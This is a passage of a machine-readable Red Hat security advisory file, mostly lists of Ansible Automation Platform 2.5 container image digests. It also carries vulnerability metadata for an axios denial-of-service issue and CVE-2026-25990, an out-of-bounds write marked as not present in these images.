"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
